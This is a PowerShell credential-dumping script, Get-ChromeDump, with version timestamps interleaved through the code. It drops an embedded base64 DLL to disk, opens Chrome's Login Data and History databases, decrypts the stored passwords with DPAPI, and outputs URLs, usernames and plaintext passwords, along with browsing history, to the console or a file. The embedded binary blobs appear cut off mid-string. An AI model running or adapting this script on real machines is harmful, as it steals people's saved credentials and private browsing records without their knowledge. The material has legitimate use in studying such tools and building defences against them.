2015-11-25 16:55:36 +00:00
Function Get-ChromeDump {
<#
. SYNOPSIS
This function returns any passwords and history stored in the chrome sqlite databases .
. DESCRIPTION
This function uses the System . Data . SQLite assembly to parse the different sqlite db files used by chrome to save passwords and browsing history . The System . Data . SQLite assembly
cannot be loaded from memory . This is a limitation for assemblies that contain any unmanaged code and / or compiled without the / clr : safe option .
. PARAMETER OutFile
Switch to dump all results out to a file .
. EXAMPLE
Get-ChromeDump -OutFile " $env:HOMEPATH \chromepwds.txt "
Dump All chrome passwords and history to the specified file
. LINK
2015-11-28 21:34:13 +00:00
http : / / www . xorrior . com
2015-11-25 16:55:36 +00:00
#>
[ CmdletBinding ( ) ]
param (
[ Parameter ( Mandatory = $False ) ]
[ string ] $OutFile
)
#Add the required assembly for decryption
Add-Type -Assembly System . Security
#Check to see if the script is being run as SYSTEM. Not going to work.
if ( ( [ System.Security.Principal.WindowsIdentity ] :: GetCurrent ( ) ) . IsSystem ) {
2015-11-28 21:34:13 +00:00
Write-Warning " Unable to decrypt passwords contained in Login Data file as SYSTEM. "
2015-11-25 16:55:36 +00:00
$NoPasswords = $True
}
2015-11-28 21:34:13 +00:00
if ( [ IntPtr ] :: Size -eq 8 )
{
#64 bit version
$assembly = " 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
}
else
{
#32 bit version
$assembly = " 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
}
2015-11-25 16:55:36 +00:00
#Unable to load this assembly from memory. The assembly was most likely not compiled using /clr:safe and contains unmanaged code. Loading assemblies of this type from memory will not work. Therefore we have to load it from disk.
2015-11-28 21:34:13 +00:00
#DLL for sqlite queries and parsing
2015-11-25 16:55:36 +00:00
#http://system.data.sqlite.org/index.html/doc/trunk/www/downloads.wiki
Write-Verbose " [+]System.Data.SQLite.dll will be written to disk "
2015-11-28 21:34:13 +00:00
$content = [ System.Convert ] :: FromBase64String ( $assembly )
2015-11-25 16:55:36 +00:00
2015-11-28 21:34:13 +00:00
$assemblyPath = " $( $env:LOCALAPPDATA ) \System.Data.SQLite.dll "
2015-11-25 16:55:36 +00:00
2015-11-28 21:34:13 +00:00
if ( Test-path $assemblyPath )
{
try
{
2015-11-25 16:55:36 +00:00
Add-Type -Path $assemblyPath
}
2015-11-28 21:34:13 +00:00
catch
{
Write-Warning " [!]Unable to load SQLite assembly "
2015-11-25 16:55:36 +00:00
break
}
}
2015-11-28 21:34:13 +00:00
else
{
[ System.IO.File ] :: WriteAllBytes ( $assemblyPath , $content )
Write-Verbose " [+]Assembly for SQLite written to $assemblyPath "
try
{
Add-Type -Path $assemblyPath
}
catch
{
Write-Warning " [!]Unable to load SQLite assembly "
break
}
}
2015-11-25 16:55:36 +00:00
#Check if Chrome is running. The data files are locked while Chrome is running
if ( Get-Process | Where-Object { $_ . Name -like " *chrome* " } ) {
2015-11-28 21:34:13 +00:00
Write-Warning " [!]Cannot parse Data files while chrome is running "
2015-11-25 16:55:36 +00:00
break
}
#grab the path to Chrome user data
$OS = [ environment ] :: OSVersion . Version
if ( $OS . Major -ge 6 ) {
$chromepath = " $( $env:LOCALAPPDATA ) \Google\Chrome\User Data\Default "
}
else {
$chromepath = " $( $env:HOMEDRIVE ) \ $( $env:HOMEPATH ) \Local Settings\Application Data\Google\Chrome\User Data\Default "
}
if ( ! ( Test-path $chromepath ) ) {
Throw " Chrome user data directory does not exist "
}
else {
#DB for CC and other info
if ( Test-Path -Path " $chromepath \Web Data " ) { $WebDatadb = " $chromepath \Web Data " }
#DB for passwords
if ( Test-Path -Path " $chromepath \Login Data " ) { $loginDatadb = " $chromepath \Login Data " }
#DB for history
if ( Test-Path -Path " $chromepath \History " ) { $historydb = " $chromepath \History " }
#$cookiesdb = "$chromepath\Cookies"
}
if ( ! ( $NoPasswords ) ) {
#Parse the login data DB
2016-04-10 02:11:28 +00:00
$connStr = " Data Source= $loginDatadb ; Read Only=True; Version=3; "
2015-11-25 16:55:36 +00:00
$connection = New-Object System . Data . SQLite . SQLiteConnection ( $connStr )
$OpenConnection = $connection . OpenAndReturn ( )
2015-11-28 21:34:13 +00:00
Write-Verbose " Opened DB file $loginDatadb "
2015-11-25 16:55:36 +00:00
$query = " SELECT * FROM logins; "
$dataset = New-Object System . Data . DataSet
$dataAdapter = New-Object System . Data . SQLite . SQLiteDataAdapter ( $query , $OpenConnection )
[ void ] $dataAdapter . fill ( $dataset )
$logins = @ ( )
2015-11-28 21:34:13 +00:00
Write-Verbose " Parsing results of query $query "
2015-11-25 16:55:36 +00:00
$dataset . Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
$encryptedBytes = $_ . password_value
$username = $_ . username_value
$url = $_ . action_url
$decryptedBytes = [ Security.Cryptography.ProtectedData ] :: Unprotect ( $encryptedBytes , $null , [ Security.Cryptography.DataProtectionScope ] :: CurrentUser )
$plaintext = [ System.Text.Encoding ] :: ASCII . GetString ( $decryptedBytes )
$login = New-Object PSObject -Property @ {
URL = $url
PWD = $plaintext
User = $username
}
$logins + = $login
}
}
#Parse the History DB
$connString = " Data Source= $historydb ; Version=3; "
$connection = New-Object System . Data . SQLite . SQLiteConnection ( $connString )
$Open = $connection . OpenAndReturn ( )
2015-11-28 21:34:13 +00:00
Write-Verbose " Opened DB file $historydb "
2015-11-25 16:55:36 +00:00
$DataSet = New-Object System . Data . DataSet
$query = " SELECT * FROM urls; "
$dataAdapter = New-Object System . Data . SQLite . SQLiteDataAdapter ( $query , $Open )
[ void ] $dataAdapter . fill ( $DataSet )
$History = @ ( )
$dataset . Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
$HistoryInfo = New-Object PSObject -Property @ {
Title = $_ . title
URL = $_ . url
}
$History + = $HistoryInfo
}
if ( ! ( $OutFile ) ) {
" [*]CHROME PASSWORDS `n "
$logins | Format-Table URL , User , PWD -AutoSize | Out-String
" [*]CHROME HISTORY `n "
2015-11-28 21:34:13 +00:00
$History | Format-List Title , URL | Out-String
2015-11-25 16:55:36 +00:00
}
else {
" [*]LOGINS `n " | Out-File $OutFile
$logins | Out-File $OutFile -Append
" [*]HISTORY `n " | Out-File $OutFile -Append
$History | Out-File $OutFile -Append
}
2015-11-28 21:34:13 +00:00
Write-Warning " [!] Please remove SQLite assembly from here: $assemblyPath "
2015-11-25 16:55:36 +00:00
}